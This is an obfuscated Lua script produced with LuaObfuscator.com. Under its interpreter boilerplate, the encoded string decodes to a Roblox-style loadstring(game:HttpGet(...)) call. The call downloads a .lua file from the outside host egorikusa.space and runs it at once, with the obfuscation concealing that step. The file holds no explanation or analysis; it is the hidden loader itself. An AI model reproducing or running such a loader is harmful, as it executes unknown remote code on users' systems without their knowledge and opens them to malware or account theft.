--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v87=v2(v0(v30,16));if v19 then local v109=v5(v87,v19);v19=nil;return v109;else return v87;end end end);local function v20(v31,v32,v33) if v33 then local v88=(v31/(2^(v32-(2 -1))))%((5 -3)^(((v33-((1 + 0) -(877 -(282 + 595)))) -(v32-(2 -1))) + (620 -(555 + (1701 -(1523 + 114)))))) ;return v88-(v88%(932 -(857 + 74))) ;else local v89=0;local v90;while true do if (v89==(568 -(367 + 201))) then v90=2^(v32-(928 -(214 + 713))) ;return (((v31%(v90 + v90))>=v90) and 1) or (0 + 0) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (2 -0) ;return (v36 * (1321 -(68 + 997))) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + ((2230 -(892 + 65)) -(226 + 1044)) );v18=v18 + (17 -13) ;return (v40 * (16777333 -(32 + 85))) + (v39 * (64226 + 1310)) + (v38 * ((135 -78) + 199)) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=1 -0 ;local v44=(v20(v42,1 -0 ,20) * ((352 -((154 -67) + 263))^(212 -(67 + 113 + 0)))) + v41 ;local v45=v20(v42,16 + 5 ,75 -44 );local v46=((v20(v42,24 + 8 )==((11 -8) -(444 -(416 + 26)))) and  -(953 -(802 + 150))) or ((6 -4) -1) ;if (v45==(791 -(368 + 423))) then if (v44==(0 -(0 + 0))) then return v46 * (0 + 0) ;else local v110=997 -(915 + 82) ;while true do if (v110==((0 -0) -0)) then v45=1;v43=(0 -0) + 0 ;break;end end end elseif (v45==2047) then return ((v44==(0 -0)) and (v46 * ((1188 -(1069 + 118))/0))) or (v46 * NaN) ;end return v8(v46,v45-(2320 -(1735 -(145 + 293))) ) * (v43 + (v44/((3 -1)^(10 + (472 -(44 + 386)))))) ;end local function v25(v47) local v48=1486 -(998 + 488) ;local v49;local v50;while true do if (v48==(1 + 1)) then v50={};for v111=1, #v49 do v50[v111]=v2(v1(v3(v49,v111,v111)));end v48=(10 -7) + 0 ;end if ((775 -(201 + 571))==v48) then return v6(v50);end if (v48==1) then v49=v3(v16,v18,(v18 + v47) -((1998 -(814 + 45)) -(116 + 1022)) );v18=v18 + v47 ;v48=2;end if (v48==(0 -0)) then v49=nil;if  not v47 then v47=v23();if (v47==(0 + 0)) then return "";end end v48=3 -2 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v91,v92,v93,v94,v95,v96,v97,v98,v99) local v100=(function() return 0 -0 ;end)();local v91=(function() return;end)();local v92=(function() return;end)();while true do if (v100==(0 + 0)) then v91=(function() return 836 -(660 + 176) ;end)();v92=(function() return nil;end)();v100=(function() return 1;end)();end if (v100==(1 + 0)) then while true do if (v91==(1824 -(1195 + 629))) then v92=(function() return v93();end)();if (v94(v92, #"[", #"!")==0) then local v121=(function() return 202 -(14 + 188) ;end)();local v122=(function() return;end)();local v123=(function() return;end)();local v124=(function() return;end)();while true do if (v121~=0) then else local v160=(function() return 0 -0 ;end)();while true do if (v160~=1) then else v121=(function() return 676 -(534 + 141) ;end)();break;end if (v160~=0) then else local v175=(function() return 0 + 0 ;end)();while true do if (v175==(781 -(162 + 618))) then v160=(function() return 1 + 0 ;end)();break;end if ((0 + 0)==v175) then v122=(function() return v94(v92,3 -1 , #"91(");end)();v123=(function() return v94(v92, #"asd1",6 + 0 );end)();v175=(function() return 1;end)();end end end end end if (v121==(1 + 0)) then local v161=(function() return 0 -0 ;end)();while true do if (v161==(0 -0)) then v124=(function() return {v95(),v95(),nil,nil};end)();if (v122==(0 -0)) then local v176=(function() return 0 -0 ;end)();local v177=(function() return;end)();while true do if ((0 + 0)==v176) then v177=(function() return 0 + 0 ;end)();while true do if (v177==(396 -(115 + 281))) then v124[ #"91("]=(function() return v95();end)();v124[ #".dev"]=(function() return v95();end)();break;end end break;end end elseif (v122== #",") then v124[ #"asd"]=(function() return v96();end)();elseif (v122==2) then v124[ #"-19"]=(function() return v96() -(2^(26 -10)) ;end)();elseif (v122== #"asd") then local v182=(function() return 0;end)();local v183=(function() return;end)();while true do if (v182~=(0 -0)) then else v183=(function() return 0 + 0 ;end)();while true do if (v183~=(0 + 0)) then else v124[ #"gha"]=(function() return v96() -(2^(23 -7)) ;end)();v124[ #".dev"]=(function() return v95();end)();break;end end break;end end end v161=(function() return 342 -(218 + 123) ;end)();end if ((2 -1)~=v161) then else v121=(function() return 1583 -(1535 + 46) ;end)();break;end end end if (v121==(10 -7)) then if (v94(v123, #"91(", #"19(")~= #"<") then else v124[ #"xnxx"]=(function() return v97[v124[ #"0313"]];end)();end v98[v99]=(function() return v124;end)();break;end if (v121==(1 + 1)) then if (v94(v123, #"!", #">")== #"|") then v124[562 -(306 + 254) ]=(function() return v97[v124[869 -(550 + 317) ]];end)();end if (v94(v123,3 -1 ,2)~= #"~") then else v124[ #"91("]=(function() return v97[v124[ #"xxx"]];end)();end v121=(function() return 1470 -(899 + 568) ;end)();end end end break;end end return v91,v92,v93,v94,v95,v96,v97,v98,v99;end end end;end)();local v52=(function() return function(v101,v102,v103) local v104=(function() return 0 -0 ;end)();local v105=(function() return;end)();while true do if (v104==(0 + 0)) then v105=(function() return 0;end)();while true do if (v105==(0 -0)) then v101[v102-#"}" ]=(function() return v103();end)();return v101,v102,v103;end end break;end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return {};end)();for v66= #"\\",v57 do local v67=(function() return 290 -(60 + 230) ;end)();local v68=(function() return;end)();local v69=(function() return;end)();local v70=(function() return;end)();while true do if (v67==1) then v70=(function() return nil;end)();while true do if (v68==(0 -0)) then local v118=(function() return 572 -(426 + 146) ;end)();while true do if (v118==(0 + 0)) then v69=(function() return v21();end)();v70=(function() return nil;end)();v118=(function() return 1457 -(282 + 1174) ;end)();end if (v118==(812 -(569 + 242))) then v68=(function() return 2 -1 ;end)();break;end end end if (v68==(2 -1)) then if (v69== #"{") then v70=(function() return v21()~=(1024 -(706 + 318)) ;end)();elseif (v69==(287 -(134 + 151))) then v70=(function() return v24();end)();elseif (v69== #"19(") then v70=(function() return v25();end)();end v58[v66]=(function() return v70;end)();break;end end break;end if (v67~=0) then else local v113=(function() return 1665 -(970 + 695) ;end)();while true do if (v113==(1272 -(945 + 326))) then v67=(function() return 1;end)();break;end if (v113==(0 -0)) then v68=(function() return 1990 -(582 + 1408) ;end)();v69=(function() return nil;end)();v113=(function() return 1;end)();end end end end end v56[ #"xxx"]=(function() return v21();end)();for v71= #">",v23() do FlatIdent_7DD24,Descriptor,v21,v20,v22,v23,v58,v53,v71=(function() return v51(FlatIdent_7DD24,Descriptor,v21,v20,v22,v23,v58,v53,v71);end)();end for v72= #"/",v23() do v54,v72,v28=(function() return v52(v54,v72,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[2 -1 ];local v64=v60[2 + 0 ];local v65=v60[703 -(271 + 429) ];return function(...) local v73=v63;local v74=v64;local v75=v65;local v76=v27;local v77=1 + 0 ;local v78= -(1501 -(1408 + 92));local v79={};local v80={...};local v81=v12("#",...) -(1289 -((2544 -(1126 + 425)) + 295)) ;local v82={};local v83={};for v106=0 + 0 ,v81 do if (v106>=v75) then v79[v106-v75 ]=v80[v106 + (1172 -(418 + 753)) ];else v83[v106]=v80[v106 + 1 + 0 ];end end local v84=(v81-v75) + 1 + 0 ;local v85;local v86;while true do v85=v73[v77];v86=v85[1];if ((3244>1055) and (v86<=(3 + 4))) then if (v86<=(1 + 2)) then if ((1623<=1957) and (v86<=(530 -(406 + (528 -(118 + 287)))))) then if ((4412==4412) and (v86>(1769 -((6854 -5105) + 20)))) then v83[v85[1 + 1 ]]=v85[1325 -(1249 + 73) ];else local v127=0 + (1121 -(118 + 1003)) ;local v128;while true do if (0==v127) then v128=v85[(3356 -2209) -(466 + (1056 -(142 + 235))) ];v83[v128]=v83[v128](v13(v83,v128 + 1 ,v78));break;end end end elseif (v86>(4 -(9 -7))) then v83[v85[(2 + 3) -3 ]]=v85[1903 -(106 + 1794) ]~=(0 + 0) ;else do return;end end elseif (v86<=((979 -(553 + 424)) + 3)) then if ((v86==(11 -7)) or (3313<=1778)) then v83[v85[5 -3 ]]=v85[117 -(4 + 110) ]~=(584 -(57 + 527)) ;else v83[v85[1429 -(41 + (2620 -1234)) ]]();end elseif ((1750>=842) and (v86>6)) then local v131=v85[105 -(17 + 86) ];local v132=v83[v85[3]];v83[v131 + 1 + 0 ]=v132;v83[v131]=v132[v85[8 -(4 + 0) ]];else local v136=v85[5 -3 ];local v137,v138=v76(v83[v136](v13(v83,v136 + ((166 + 1) -(122 + 44)) ,v85[3])));v78=(v138 + v136) -(1 -0) ;local v139=0 -0 ;for v155=v136,v78 do v139=v139 + 1 + 0 ;v83[v155]=v137[v139];end end elseif ((4372>1850) and (v86<=(2 + 0 + 9))) then if ((232<821) and (v86<=(17 -8))) then if ((518<902) and ((v86>(73 -(30 + 35))) or (1421>=2104))) then v83[v85[2 + 0 ]]();else local v140=v85[2];local v141,v142=v76(v83[v140](v13(v83,v140 + (1258 -(1043 + 214)) ,v85[11 -8 ])));v78=(v142 + v140) -(1213 -(323 + 889)) ;local v143=0 -0 ;for v158=v140,v78 do local v159=580 -(361 + 219) ;while true do if ((2994>858) and (v159==(320 -(23 + 30 + 267)))) then v143=v143 + 1 ;v83[v158]=v141[v143];break;end end end end elseif ((v86==(3 + 7)) or (3755<=915)) then local v144=v85[(237 + 178) -(15 + 398) ];v83[v144]=v83[v144](v13(v83,v144 + (983 -((38 -20) + 964)) ,v78));else v83[v85[2]]=v62[v85[11 -8 ]];end elseif ((3946>3743) and (v86<=(8 + 5))) then if (v86==12) then v83[v85[2]]=v62[v85[2 + 1 ]];else do return;end end elseif (((1812<=3249) and (v86==(864 -(20 + 830)))) or (1335>=3306)) then v83[v85[2 + 0 ]]=v85[(359 -230) -(116 + (22 -12)) ];else local v152=0 + 0 ;local v153;local v154;while true do if (v152==(739 -(542 + 196))) then v83[v153 + (1 -0) ]=v154;v83[v153]=v154[v85[2 + 2 ]];break;end if ((0 + 0)==v152) then v153=v85[1 + 1 + 0 ];v154=v83[v85[(33 -26) -4 ]];v152=2 -1 ;end end end v77=v77 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403343Q00682Q7470733A2Q2F65676F72696B7573612E73706163652F36653966343563302Q3861636530643037623736336534662E6C756100093Q00120B3Q00013Q00120B000100023Q00200F000100010003001201000300044Q0003000400014Q0008000100044Q000A5Q00022Q00053Q000100012Q000D3Q00017Q00",v9(),...);
